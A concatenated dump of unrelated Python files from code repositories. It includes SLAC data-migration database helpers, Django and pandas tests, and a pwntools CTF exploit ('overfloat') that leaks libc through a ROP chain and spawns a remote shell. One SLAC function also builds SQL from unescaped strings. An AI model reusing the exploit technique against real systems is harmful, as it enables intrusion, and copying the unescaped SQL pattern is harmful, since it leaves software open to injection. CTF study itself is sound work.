instrinfo = __do_select_many("SELECT id,name from instrument")
for info in instrinfo:
instr[info['id']] = info['name']
return data, instr
# ----------------------------------------------------------------
# add new row to data_migration_ana for the ffb offline migration
# ----------------------------------------------------------------
def file4offline(exp_id, host, filetype, fname, dirpath):
__do_sql("""INSERT INTO data_migration_ana (exper_id,file,file_type,host,dirpath)
VALUES(%d, '%s','%s','%s','%s')""" % (exp_id, fname, filetype, host, dirpath))
# --------------------------------------------------
# Functions to keep track of file migration to NERSC
# --------------------------------------------------
def file_migration2nersc_start ( exper_id, file_name, file_type) :
exper_id = int (exper_id)
file_name = __escape_string (file_name)
file_type = __escape_string (file_type)
now = __now_64 ()
file = __do_select ("SELECT * FROM data_migration_nersc WHERE exper_id=%d AND file='%s' AND file_type='%s'" % (exper_id, file_name, file_type))
if file is None :
__do_sql ("INSERT INTO data_migration_nersc VALUES(%d,'%s','%s',%d,NULL,NULL)" % (exper_id, file_name, file_type, now))
else :
__do_sql ("UPDATE data_migration_nersc SET start_time=%d, stop_time=NULL, error_msg=NULL WHERE exper_id=%d AND file='%s' AND file_type='%s'" % (now, exper_id, file_name, file_type))
def file_migration2nersc_stop ( exper_id, file_name, file_type, error_msg=None ) :
now = __now_64 ()
exper_id = int (exper_id)
file_name = __escape_string (file_name)
file_type = __escape_string (file_type)
error_msg_sql = ", error_msg=NULL"
if error_msg is not None :
error_msg_sql = ", error_msg='%s'" % __escape_string (error_msg)
__do_sql ("UPDATE data_migration_nersc SET stop_time=%d %s WHERE exper_id=%d AND file='%s' AND file_type='%s'" % (now, error_msg_sql, exper_id, file_name, file_type))
def files2migrate2nersc(exper_id) :
select_condition = "exper_id=%d AND file_type='xtc' AND stop_time IS NOT NULL AND (error_msg IS NULL OR error_msg='0' OR error_msg='')" % int(exper_id)
# Get a list of files which have already been migrated from OFFLINE
# to NERSC and turn them into a dictionary.
migrated2nersc_dict = dict()
for file in __do_select_many ("SELECT file,file_type FROM data_migration_nersc WHERE %s" % select_condition) :
migrated2nersc_dict[file['file']] = file
# Get a list of files which have already been migrated from DAQ to OFFLINE
# and produce a list with subset of those which haven't been migrated to NERSC.
files = []
for file in __do_select_many ("SELECT file, file_type FROM data_migration WHERE %s ORDER BY file, file_type" % select_condition) :
if file['file'] not in migrated2nersc_dict :
files.append(file)
return files
# -------------------------------
# Here follow a couple of examples
# -------------------------------
if __name__ == "__main__" :
try:
print 'experiment id 47 translates into %s' % id2name(47)
print 'experiment sxrcom10 translates into id %d' % name2id('sxrcom10')
print 'data path for experiment id 116 set to %s' % getexp_datapath(116)
print 'current time is %d nanoseconds' % __now_64()
# Note that experiment id=18 corresponds to a test experiment 'amodaq09'
#
#file = 'test_file_%d.txt' % __now_64()
#file_migration_start(18,file)
#file_migration_start(18,file)
#time.sleep(1.0)
#file_migration_stop(18,file)
#time.sleep(5.0)
#file_migration_stop(18,file,"Failed 'cause of unknown reason")
#time.sleep(5.0)
#file_migration_stop(18,file)
#time.sleep(5.0)
#file_migration_stop(18,file,"Failed 'cause of unknown reason")
#time.sleep(5.0)
#file_migration_start(18,file)
#time.sleep(5.0)
#file_migration_stop(18,file)
print 'Files to be migrated from all instruments and hosts:'
for f in files2migrate():
print ' ',f
print '...and for CXI only and all hosts:'
for f in files2migrate('CXI'):
print ' ',f
print '...and for AMO only and host pslogin02:'
for f in files2migrate('AMO','pslogin02'):
print ' ',f
except db.Error, e:
print 'MySQL operation failed because of:', e
sys.exit(1)
sys.exit(0)
|
[
"wilko@SLAC.STANFORD.EDU@b967ad99-d558-0410-b138-e0f6c56caec7"
] |
wilko@SLAC.STANFORD.EDU@b967ad99-d558-0410-b138-e0f6c56caec7
|
a13219e7f39522f7f2bea3f80984f92ffcc1dbc2
|
3afc3b2a2095850503b45424df99da92cc9f3d5c
|
/app/task/taskManage.py
|
29fb5091c7bb03d6bc312b1c42ad3165a3e42868
|
[] |
no_license
|
sinly2/TestRequests
|
9b5d04cd11bae8de7d9a4dcb0fa43fc01f8eed3c
|
166d96597882790507d0d47d6c2e0093e6b31bfd
|
refs/heads/master
| 2021-05-04T06:57:42.529883
| 2017-05-17T09:36:28
| 2017-05-17T09:36:28
| 70,552,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 424
|
py
|
# -*- coding: utf-8 -*-
'''
Created on Sep 28, 2016
@author: guxiwen
'''
import sys
sys.path.append('/root/project/TestRequests')
from addRequests import addRequests
def add_requests():
addRequests.init_redis()
to_do_list = addRequests.update_svn()
print len(to_do_list)
    if len(to_do_list) != 0:
addRequests.update_redis(to_do_list)
addRequests.insert_req_into_db(to_do_list)
add_requests()
|
[
"15380794704@163.com"
] |
15380794704@163.com
|
04c1a8bc7d8b937d6cb99fc02d853e50adaabd16
|
c8cfc261d790377bedb57599c7e4e9b4a6ee60a1
|
/souvenirs/tests/test_utils.py
|
a12b76c699ae3322d62aafd6ee1631f43c687d64
|
[
"MIT"
] |
permissive
|
amygriffis/django-souvenirs
|
aa5a894b1dab7df83df4dd03bc4abcbf6773d59a
|
9aca31dd46f7433898926bd7e2f99ca4a01171f2
|
refs/heads/master
| 2021-01-18T23:42:48.307210
| 2017-04-03T14:40:04
| 2017-04-03T14:41:00
| 87,123,673
| 0
| 0
| null | 2017-04-03T21:43:01
| 2017-04-03T21:43:01
| null |
UTF-8
|
Python
| false
| false
| 4,601
|
py
|
from __future__ import absolute_import, unicode_literals
from datetime import datetime
import types
from django.utils import timezone
from souvenirs.utils import (adjust_to_calendar_month,
adjust_to_subscription_start,
iter_months, next_month, nearest_dom)
def test_adjust_to_calendar_month():
dt = timezone.make_aware(datetime(2017, 3, 27, 10, 36))
assert (adjust_to_calendar_month(dt) ==
timezone.make_aware(datetime(2017, 3, 1, 0, 0, 0, 0)))
def test_adjust_to_subscription_start():
ss = timezone.make_aware(datetime(2017, 1, 31, 23, 30))
# if dt matches ss, go with it
dt = timezone.make_aware(datetime(2017, 3, 31, 23, 30))
assert adjust_to_subscription_start(dt, ss) == dt
# if dt is after ss, simple adjust back to ss
dt = timezone.make_aware(datetime(2017, 3, 31, 23, 31))
assert (adjust_to_subscription_start(dt, ss) ==
timezone.make_aware(datetime(2017, 3, 31, 23, 30)))
# if dt is before ss, adjust back to previous month
dt = timezone.make_aware(datetime(2017, 3, 27, 10, 41))
assert (adjust_to_subscription_start(dt, ss) ==
timezone.make_aware(datetime(2017, 2, 28, 23, 30)))
# interesting scenario of dt matching adjusted ss
ss = timezone.make_aware(datetime(2016, 12, 31, 12, 0))
dt = timezone.make_aware(datetime(2017, 2, 28, 12, 0))
assert adjust_to_subscription_start(dt, ss) == dt
# interesting scenario of dt after adjusted ss
ss = timezone.make_aware(datetime(2016, 12, 31, 12, 0))
dt = timezone.make_aware(datetime(2017, 2, 28, 13, 0))
assert (adjust_to_subscription_start(dt, ss) ==
timezone.make_aware(datetime(2017, 2, 28, 12, 0)))
def test_iter_months():
start = timezone.make_aware(datetime(2015, 12, 31, 1, 2, 3))
end = timezone.make_aware(datetime(2018, 6, 10, 11, 22, 33))
months = iter_months(start, end)
assert type(months) is types.GeneratorType
starts = [
datetime.combine(datetime(year, month, day).date(), start.timetz())
for year, month, day in [
(2015, 12, 31),
(2016, 1, 31),
(2016, 2, 29), # leap!
(2016, 3, 31),
(2016, 4, 30),
(2016, 5, 31),
(2016, 6, 30),
(2016, 7, 31),
(2016, 8, 31),
(2016, 9, 30),
(2016, 10, 31),
(2016, 11, 30),
(2016, 12, 31),
(2017, 1, 31),
(2017, 2, 28),
(2017, 3, 31),
(2017, 4, 30),
(2017, 5, 31),
(2017, 6, 30),
(2017, 7, 31),
(2017, 8, 31),
(2017, 9, 30),
(2017, 10, 31),
(2017, 11, 30),
(2017, 12, 31),
(2018, 1, 31),
(2018, 2, 28),
(2018, 3, 31),
(2018, 4, 30),
(2018, 5, 31),
]
]
ends = starts[1:] + [end]
assert list(months) == list(zip(starts, ends))
def test_next_month():
dt = timezone.make_aware(datetime(2017, 3, 30, 11, 5))
assert next_month(dt) == timezone.make_aware(datetime(2017, 4, 30, 11, 5))
assert next_month(dt, delta=2) == timezone.make_aware(datetime(2017, 5, 30, 11, 5))
assert next_month(dt, delta=12) == timezone.make_aware(datetime(2018, 3, 30, 11, 5))
assert next_month(dt, delta=-1) == timezone.make_aware(datetime(2017, 2, 28, 11, 5))
assert next_month(dt, delta=-12) == timezone.make_aware(datetime(2016, 3, 30, 11, 5))
assert (next_month(dt, preferred_dom=31) ==
timezone.make_aware(datetime(2017, 4, 30, 11, 5)))
assert (next_month(dt, preferred_dom=31, delta=2)
== timezone.make_aware(datetime(2017, 5, 31, 11, 5)))
assert (next_month(dt, preferred_dom=31, delta=12)
== timezone.make_aware(datetime(2018, 3, 31, 11, 5)))
assert (next_month(dt, preferred_dom=31, delta=-1)
== timezone.make_aware(datetime(2017, 2, 28, 11, 5)))
assert (next_month(dt, preferred_dom=31, delta=-12)
== timezone.make_aware(datetime(2016, 3, 31, 11, 5)))
def test_nearest_dom():
assert nearest_dom(2017, 1, 1) == 1
assert nearest_dom(2017, 1, 31) == 31
assert nearest_dom(2017, 2, 27) == 27
assert nearest_dom(2017, 2, 28) == 28
assert nearest_dom(2017, 2, 29) == 28
assert nearest_dom(2017, 2, 30) == 28
assert nearest_dom(2017, 2, 31) == 28
|
[
"aron@scampersand.com"
] |
aron@scampersand.com
|
996c636d778f2142359b3fb35a9efac1f9340a3a
|
237d2d03f83b0a5c3a8927c316d064f674ef804b
|
/ctf/22_fbctf/overfloat/dist/exploit.py
|
e6b2f5b0febcdfda67c1e575a3345eeafd9933c6
|
[] |
no_license
|
bachzz/CTF-for-fun
|
5f0d3bf289b92b489bc2c79c1c0af0de88ad23de
|
ea6e7d8b178e7b294af58c037dc477c368da0a82
|
refs/heads/master
| 2022-02-12T21:59:45.022883
| 2019-07-02T16:22:20
| 2019-07-02T16:22:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,183
|
py
|
from pwn import *
import struct
e = ELF("./overfloat")
libc = ELF("./libc-2.27.so")
#p = process("./overfloat")
p = remote("challenges.fbctf.com", 1341)
for symbol in e.symbols:
#if "system" in symbol or "bin" in symbol:
print symbol, hex(e.symbols[symbol])
print p.recv()
pop_rdi = int("0x400a83", 16)
pop_rdi_ieee = struct.unpack('f', struct.pack('I', pop_rdi))[0]
puts_plt = e.symbols['puts']
puts_plt_ieee = struct.unpack('f', struct.pack('I', puts_plt))[0]
puts_got = e.symbols['got.puts']
puts_got_ieee = struct.unpack('f', struct.pack('I', puts_got))[0]
main = e.symbols['main']
main_ieee = struct.unpack('f', struct.pack('I', main))[0]
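# Quick aside on the float encoding above (sanity check only, not part of the
# exploit): packing a 32-bit value as an unsigned int and re-reading the same
# four bytes as an IEEE-754 float keeps the bit pattern, so when the target
# parses the float and stores its raw bytes, the intended address lands on the
# stack.
_demo_float = struct.unpack('f', struct.pack('I', pop_rdi))[0]
assert struct.unpack('I', struct.pack('f', _demo_float))[0] == pop_rdi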
puts_off = int("0x809c0", 16)
binsh_off = int("0x1b3e9a", 16)
system_off = int("0x4f440", 16)
#print puts_plt_ieee
#print puts_got_ieee
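# Stage 1 ROP chain (payload below): 14 filler floats, then pop rdi; rdi =
# puts@got; call puts@plt to leak libc's puts address; return to main for a
# second pass. Each "\n0\n" supplies the zero upper half of a 64-bit stack
# slot, since the program stores one 32-bit float at a time.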
payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(puts_got_ieee)+"\n0\n"+str(puts_plt_ieee)+"\n0\n"+str(main_ieee)+"\n0\n"+"done\n"
#print payload
p.send(payload)
p.recvuntil("BON VOYAGE!\n")
puts_addr = u64(p.recv(6)+'\x00\x00')
system_addr = puts_addr - puts_off + system_off
binsh_addr = puts_addr - puts_off + binsh_off
#print p.recv()
#system_addr_ieee = struct.unpack('f', struct.pack('I', system_addr))[0]
#binsh_addr_ieee = struct.unpack('f', struct.pack('I', binsh_addr))[0]
print "puts: " + hex(puts_addr)
print "system: " + hex(system_addr)#[-6*2:-4*2+1]+hex(system_addr)[-4*2:]
print "binsh: " + hex(binsh_addr)
system_addr_LHALF = hex(system_addr)[-6*2:-4*2]
system_addr_RHALF = hex(system_addr)[-4*2:]
binsh_addr_LHALF = hex(binsh_addr)[-6*2:-4*2]
binsh_addr_RHALF = hex(binsh_addr)[-4*2:]
system_addr_LHALF_ieee = struct.unpack('f', struct.pack('I', int(system_addr_LHALF,16)))[0]
system_addr_RHALF_ieee = struct.unpack('f', struct.pack('I', int(system_addr_RHALF,16)))[0]
binsh_addr_LHALF_ieee = struct.unpack('f', struct.pack('I', int(binsh_addr_LHALF, 16)))[0]
binsh_addr_RHALF_ieee = struct.unpack('f', struct.pack('I', int(binsh_addr_RHALF,16)))[0]
print system_addr_LHALF + system_addr_RHALF
print binsh_addr_LHALF + binsh_addr_RHALF
print str(pop_rdi_ieee)
print str(system_addr_LHALF_ieee) + " " + str(system_addr_RHALF_ieee)
print str(binsh_addr_LHALF_ieee) + " " + str(binsh_addr_RHALF_ieee)
payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_RHALF_ieee)+"\n"+str(binsh_addr_LHALF_ieee)+"\n"+str(system_addr_RHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_RHALF_ieee)+"\n"+str(binsh_addr_LHALF_ieee)+"\n"+str(system_addr_RHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+"done\n"
#payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_LHALF_ieee)+"\n"+str(binsh_addr_RHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+str(system_addr_RHALF_ieee)+"\n"+"done\n"
print p.recv()
#sleep(1)
p.send(payload)
#sleep(1)
print p.recv()
#payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_RHALF_ieee)+"\n"+str(binsh_addr_LHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+"done\n"
#p.send(payload)
p.interactive()
'''
payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_ieee)+"\n0\n"+str(system_addr_ieee)+"\n0\n"+"\n0\n"+"done\n"
p.send(payload)
p.interactive()'''
|
[
"ngb1998@gmail.com"
] |
ngb1998@gmail.com
|
4e2fbfe28081ebcc9310ed6d899d397b27753623
|
d700521a2b1320c8f74789a98872da92495b143d
|
/PythonProjectsV3/Online/__init__.py
|
0621de907bc3f162d944efb1855c1b590c28ceb5
|
[] |
no_license
|
JiangYingyan/QAASproject
|
cf53a2971ccc75418de25cd98dbf344ebd03ae7b
|
51784f8ad660e8a50bdeeb62bd140116913e27d2
|
refs/heads/master
| 2020-03-19T03:02:31.622846
| 2018-07-06T07:17:50
| 2018-07-06T07:17:50
| 135,688,125
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 40
|
py
|
from Online.OnlineTest import OnlineTest
|
[
"790568256@qq.com"
] |
790568256@qq.com
|
ed06089dee606af4dbf1e8c334d5ed842f26537e
|
8f1699af1238f91673362db6cbe454d1fd2bbd8a
|
/tests/dummy_test.py
|
a6ed9bd2fc4d95d10786377043b53b02d1fc1eea
|
[] |
no_license
|
vttta/pyTest
|
9f9c204d4f4e574acbbed9009c8769ce91ce640b
|
6726dae4d52b8d5ab2deceaf69952ff5f37a2a7d
|
refs/heads/master
| 2021-04-23T17:19:06.087874
| 2020-04-02T11:26:13
| 2020-04-02T11:26:13
| 249,943,074
| 0
| 0
| null | 2020-03-25T10:00:04
| 2020-03-25T10:00:03
| null |
UTF-8
|
Python
| false
| false
| 42
|
py
|
def test_hello_world():
assert 1 == 1
|
[
"58547432+vttta@users.noreply.github.com"
] |
58547432+vttta@users.noreply.github.com
|
12f0786b5f49225d91f4716887fc6a11e4f11270
|
8233c671aa362e83ca909dd41857b653ecb58fba
|
/test_pandas_series.py
|
f9bdc94e04892b5d6a9eb93fad0c8ef95ca0ef0a
|
[] |
no_license
|
rheehot/python-test-driven-learning
|
7f3e029d7ace1c605e65955a0c823d1f58db03b1
|
443a3422d8407208a7c3e58d05fac95e3f0da65a
|
refs/heads/master
| 2022-12-19T13:53:29.367545
| 2020-09-29T20:45:29
| 2020-09-29T20:45:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,285
|
py
|
import pandas as pd
import numpy as np
def assert_array_equal(arr1, arr2):
if not np.array_equal(arr1, arr2):
raise ValueError("{} is not {}".format(arr1, arr2))
def test_isin():
s = pd.Series([1, 2, 2, 3, 3, 3])
assert_array_equal(s[s.isin([1, 2])].values, [1, 2, 2])
assert_array_equal(s[~s.isin([1, 2])].values, [3, 3, 3])
def test_replace():
s = pd.Series(['abc'])
# str replace
assert s.str.replace('b', 'a')[0] == 'aac'
# regex is True by default
assert s.str.replace(r'\w+', 'a')[0] == 'a'
# replace
assert s.replace('abc', 'aaa')[0] == 'aaa'
# it only replaces when the given value matches exactly
# when no regex=True is passed.
assert s.replace('a', 'b')[0] == 'abc'
# it can replace types other than str
assert pd.Series([0]).replace(0, 1)[0] == 1
def test_logical_not():
assert_array_equal(-pd.Series([True, False]), [False, True])
assert_array_equal(~pd.Series([True, False]), [False, True])
def test_groupby_multi_keys():
s = pd.Series([1, 2, 3, 4, 5, 6, 7, 8])
k1 = pd.Series(['a', 'a', 'a', 'a', 'b', 'b', 'b', 'b'])
k2 = pd.Series(['c', 'c', 'd', 'd', 'e', 'e', 'f', 'f'])
# a c 1.5
# d 3.5
# b e 5.5
# f 7.5
# dtype: float64
assert_array_equal(s.groupby([k1, k2]).mean(), [1.5, 3.5, 5.5, 7.5])
def test_groupby():
s = pd.Series(['a', 'b', 'b'])
# self groupby
assert s.groupby(s).agg('count').equals(
pd.Series(data=[1, 2], index=['a', 'b']))
# count - excluding missing values
assert s.groupby(s).count().equals(
pd.Series(data=[1, 2], index=['a', 'b']))
assert s.groupby(s).size().equals(pd.Series(data=[1, 2], index=['a', 'b']))
# groupby by other series
s = pd.Series([1, 1, 2])
assert s.groupby(pd.Series(['a', 'b', 'b'])).agg('sum').equals(
pd.Series(data=[1, 3], index=['a', 'b']))
assert s.groupby(pd.Series(['a', 'b', 'b'])).sum().equals(
pd.Series(data=[1, 3], index=['a', 'b']))
# https://stackoverflow.com/questions/45338209/filtering-string-float-interger-values-in-columns-pandas
def test_filter_numbers():
s = pd.Series([1, 'a', '3', '-1.1'])
assert_array_equal(
pd.to_numeric(s, errors='coerce').dropna(), [1, 3, -1.1])
assert_array_equal(s[pd.to_numeric(s, errors='coerce').notnull()],
pd.Series([1, '3', '-1.1']))
def test_values_vs_tolist():
s = pd.Series([1, 'a'])
assert type(s.values).__module__ == 'numpy'
assert type(s.values).__name__ == 'ndarray'
assert type(s.tolist()).__module__ == 'builtins'
assert type(s.tolist()).__name__ == 'list'
def test_series_category():
s = pd.Series(['A', 'B', 'C'], index=['A', 'B', 'C']).astype(
'category', categories=['C', 'B', 'A'], ordered=True)
assert len(s[s > 'B']) == 1
def test_series_dtype():
assert str(pd.Series([1]).dtype) == 'int64'
assert str(pd.Series([1, None]).dtype) == 'float64'
assert str(pd.Series(['a', None]).dtype) == 'object'
def test_series_nan():
nan = pd.Series([1, None])[1]
assert str(nan) == 'nan'
assert nan != np.nan
assert np.isnan(nan)
def test_series_dictionary():
numbers = {'one': 1, 'two': 2}
s = pd.Series(numbers)
assert_array_equal(s.index.values, ['one', 'two'])
assert_array_equal(s.values, [1, 2])
s = pd.Series([1, 2], index=['one', 'two'])
assert_array_equal(s.index.values, ['one', 'two'])
assert_array_equal(s.values, [1, 2])
s = pd.Series(s, index=['one', 'three'])
assert s[0] == 1
assert s.index[0] == 'one'
assert np.isnan(s[1])
assert s.index[1] == 'three'
def test_series_name():
s = pd.Series([1, 2], name='numbers')
assert s.name == 'numbers'
def test_querying_series():
numbers = {'one': 1, 'two': 2}
s = pd.Series(numbers)
assert s.iloc[1] == 2
assert s.loc['one'] == 1
# not recommended as labels can be number
assert s[1] == 2
assert s['one'] == 1
# vectorized calculation is much faster
assert np.sum(s) == 3
s += 2
assert np.sum(s) == 7
# append doesn't change the original object
new_s = s.append(pd.Series({'three': 3}))
assert len(s) == 2
assert len(new_s) == 3
|
[
"hammerha@gmail.com"
] |
hammerha@gmail.com
|
9a299405d30a0333140420faa7903f510448041f
|
568b96af7b2a56adf286d0aeafa2d5cf4f2a6d28
|
/test.py
|
1da3c2ca0d870052c1d87ba4dbe67dfa098bbb2a
|
[
"MIT"
] |
permissive
|
wisehackermonkey/Generator_20200324_simplified_regex
|
4995914873ffe81212838f079cac2186d0eae9b9
|
58931a5ab1e74a9d9f207e40494106fb86f048b9
|
refs/heads/master
| 2021-10-27T08:37:58.793025
| 2021-10-25T17:19:37
| 2021-10-25T17:19:37
| 249,739,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,814
|
py
|
# simple test function code, NOTE: does not do validation
# by oran collins
# 20200329
from generator import generator
gen = generator("[1-255].[1-255].[1-255].[1-255]")
print(gen.get())
def formater(func,_string):
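    # prints "<func name>: <input> => <result>", each field padded to 30 chars;
    # an empty _string means call func with no argument (used for gen.get below)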
if len(_string) <= 0:
print(f"{func.__name__:<30}: {_string:<30} => {func()}")
else:
print(f"{func.__name__:<30}: {_string:<30} => {func(_string)}")
test_string = "[A-C]"
test_string_number = "[1-3]"
test_string_char_selection = "[Ac4]"
test_string_controll_parens = "[1-3](command)"
test_string_controll_parens_v2 = "(command2)"
test_string_breakets = "[asdfads]"
test_string_multiple= "[A-C](command)[A-C]"
test_string_multiple2= "[[]()[]]"
test_string_multiple_only_brackets= "[A-C][A-C]"
test_string_multiple_only_brackets2= "[A-C][sts][A-C]"
test_string_multiple_only_brackets_unbalanced= "[A-C][A-C]]"
test_string_multiple_with_parens = "[A-C]()[A-C]()"
test_string_list_shorthand = "[AA,AA]"
test_string_list_shorthand_true_v1 = r"[AA,A\,A]"
test_string_list_shorthand_false = "[AAAA]"
test_string_list_shorthand_false2 = r"[AAA\(A]"
test_string_multiple_list_shorthand_true_v1 = r"[acb][123][X-Z]"
test_string_multiple_list_shorthand_true_v2 = r"[\,\(\[][123][X-Z]"
# print(gen.char_range_gen(start="a",end="c"))
# print(gen.int_range_gen(start=1,end=3))
# # Driver code
# # string = "{[]{()}}"
string = test_string_multiple
print(string, "-", "Balanced" if gen.check(string) else "Unbalanced")
print("-----------------")
formater(gen.parse_letters, test_string_number)
formater(gen.parse_numbers, test_string_number)
formater(gen.parse_char_selection, test_string_char_selection)
formater(gen.parse_parens_one, test_string_controll_parens)
formater(gen.parse_parens_one, test_string_controll_parens_v2)
formater(gen.parse_controll_characters, test_string_multiple)
formater(gen.parse_controll_characters, test_string_multiple2)
formater(gen.parse_brackets, test_string_breakets)
formater(gen.remove_letters, test_string_multiple)
formater(gen.remove_letters, test_string_multiple2)
formater(gen.parse_multiple, test_string_multiple_only_brackets)
formater(gen.parse_multiple, test_string_multiple_only_brackets2)
formater(gen.parse_multiple, test_string_multiple_only_brackets_unbalanced)
formater(gen.parse_multiple, test_string_multiple_with_parens)
formater(gen.is_short_hand, test_string_list_shorthand)
formater(gen.is_short_hand, test_string_list_shorthand_false)
formater(gen.is_short_hand, test_string_list_shorthand_false2)
formater(gen.is_short_hand, test_string_list_shorthand_true_v1)
formater(gen.parse_multiple, test_string_multiple_list_shorthand_true_v1)
formater(gen.remove_non_controll_characters, "[A-C](command)[A-C]")
formater(gen.parse_multiple, test_string_multiple_list_shorthand_true_v2)
formater(gen.get, "")
|
[
"oranbusiness@gmail.com"
] |
oranbusiness@gmail.com
|
c0f489053bc19e46cc9591c80711baca3f3cf93f
|
54cacbd6256be3f0a1b0eb06c601f363950e767c
|
/api/migrations/0002_auto_20201120_1633.py
|
496ebb4b3af4e85a0afbbd5777e8da36c0bb780b
|
[] |
no_license
|
mballard29/SocialSounds
|
5cf6b95307738579e80be17b4dc8139b4b208c3f
|
a714d0add93514fe438d0dde22f27991aaba5cf9
|
refs/heads/master
| 2023-02-17T16:27:02.168391
| 2021-01-15T03:52:39
| 2021-01-15T03:52:39
| 329,802,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
# Generated by Django 3.1.2 on 2020-11-20 21:33
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('api', '0001_initial'),
]
operations = [
migrations.AlterUniqueTogether(
name='like',
unique_together={('item', 'owner')},
),
]
|
[
"mmballard29@gmail.com"
] |
mmballard29@gmail.com
|
6728b778e2b562d80d8e1f4363423e23a764180f
|
dc6d30bd1364fa9946a1fd7af61a4ce9c98dbc64
|
/py-set-discard-remove-pop/solution.py
|
e4e4613da8cbd1bea32e405dfbdd14fb58e4f38d
|
[] |
no_license
|
tamarit/hackerrank_phyton
|
4ff072fc913d33c2bb6d238fbf062a5333d009a2
|
7c3464903d96cdbf67dd9eacd64985f4e1f828ae
|
refs/heads/master
| 2021-01-01T18:19:35.327850
| 2017-08-17T09:43:01
| 2017-08-17T09:43:01
| 98,305,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 367
|
py
|
# https://www.hackerrank.com/challenges/py-set-discard-remove-pop
n = int(input())
s = set(map(int, input().split()))
m = int(input())
for i in range(0, m):
cmd = input().strip().split()
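    # dispatch table: look up the command word and call the matching set
    # operation; 'remove' and 'discard' take the parsed int argument, 'pop'
    # takes none (the dict of lambdas is rebuilt on every iteration)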
{
'remove':
lambda:
s.remove(int(cmd[1])),
'discard':
lambda:
s.discard(int(cmd[1])),
'pop':
lambda:
s.pop()
}[cmd[0]]()
print(sum(s))
|
[
"stamarit@software.imdea.org"
] |
stamarit@software.imdea.org
|
c81197fbccf4610700ff45258fd352c524487cef
|
a5fc03760df101bf4c23dd5635bd59767ce9e138
|
/lc/containerWithMostWater.py
|
d970fbd38f1ff13158a549a61cf340483e388c4d
|
[] |
no_license
|
MG11/DSA
|
cbb619f3d6fe772916fc1856d37edb7e2a82b664
|
5dc3a46ddfde5e1f813be9517cf75a94a4ec43f6
|
refs/heads/master
| 2023-04-20T07:34:28.098078
| 2021-05-08T17:36:06
| 2021-05-08T17:36:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,150
|
py
|
#Given n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai).
# n vertical lines are drawn such that the two endpoints of the line i is at (i, ai) and (i, 0).
# Find two lines, which, together with the x-axis forms a container, such that the container contains the most water.
#Input: height = [1,8,6,2,5,4,8,3,7]
#Output: 49
#Explanation: The above vertical lines are represented by array [1,8,6,2,5,4,8,3,7]. In this case,
# the max area of water (blue section) the container can contain is 49.
class Solution:
def maxArea(self, height): # O(n^2)
result = 0
for i in range(len(height)-1):
for j in range(i+1,len(height)):
area = (j-i) * min(height[i],height[j])
result = max(result, area)
return result
class Solution:
def maxArea(self, height): # O(n)
result = 0
l,r=0,len(height)-1
while l < r:
area = (r-l) * min(height[l], height[r])
result=max(result, area)
if height[l] < height[r]:
l+=1
else:
r-=1
return result
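
# Quick check using the sample from the problem statement above:
# [1,8,6,2,5,4,8,3,7] -> 49. The second Solution definition shadows the first,
# so Solution() here is the O(n) two-pointer version; it advances the pointer
# at the shorter line because keeping it can never give a larger area (the
# width only shrinks and the height stays capped by that shorter line).
if __name__ == "__main__":
    assert Solution().maxArea([1, 8, 6, 2, 5, 4, 8, 3, 7]) == 49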
|
[
"sankalp@webintensive.com"
] |
sankalp@webintensive.com
|
57bbbc48c3df90ccafc6950aeac2051d238a1105
|
acc8fa05cc49775fdf13c3d34177cbec8d2349a3
|
/main/migrations/0009_auto_20190513_0742.py
|
290562864b54ddd944e4c66181e2258d2e583a85
|
[] |
no_license
|
beatSpatial/paf_lite
|
f2bd6452b4c33740e2af94ac2f4056808c064117
|
37ed29f33483ff10b74e230e6de7a45231086a4e
|
refs/heads/master
| 2023-05-02T12:31:00.609020
| 2019-06-11T20:42:14
| 2019-06-11T20:42:14
| 188,784,489
| 0
| 0
| null | 2023-04-21T20:33:27
| 2019-05-27T06:31:54
|
Python
|
UTF-8
|
Python
| false
| false
| 908
|
py
|
# Generated by Django 2.2 on 2019-05-13 07:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0008_rating_student'),
]
operations = [
migrations.AlterModelOptions(
name='rating',
options={'get_latest_by': ['created_at', 'updated_at']},
),
migrations.AddField(
model_name='rating',
name='allocator',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='allocator', to='main.Student'),
preserve_default=False,
),
migrations.AlterField(
model_name='rating',
name='student',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='student', to='main.Student'),
),
]
|
[
"abeatson411@gmail.com"
] |
abeatson411@gmail.com
|
71dbbc03c5f68546fa67b47b295fd61eefcc15bd
|
6edf174b5b94c65e5caea4e32ce819492b875c38
|
/Django/ajax_demo/apps/demo_app/views.py
|
7d8ab1e482243e1134752bbd184add9bd77e6970
|
[] |
no_license
|
sec2890/Python
|
fc7f27f9d89962f26b1e318499235b0148394422
|
6796b3048fe11280fd81f7abed49f900fd34d518
|
refs/heads/master
| 2020-06-09T07:34:57.698322
| 2019-06-23T23:22:04
| 2019-06-23T23:22:04
| 193,401,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
from django.shortcuts import render, HttpResponse, redirect
from django.contrib import messages
from .models import *
from django.core import serializers
def index(request):
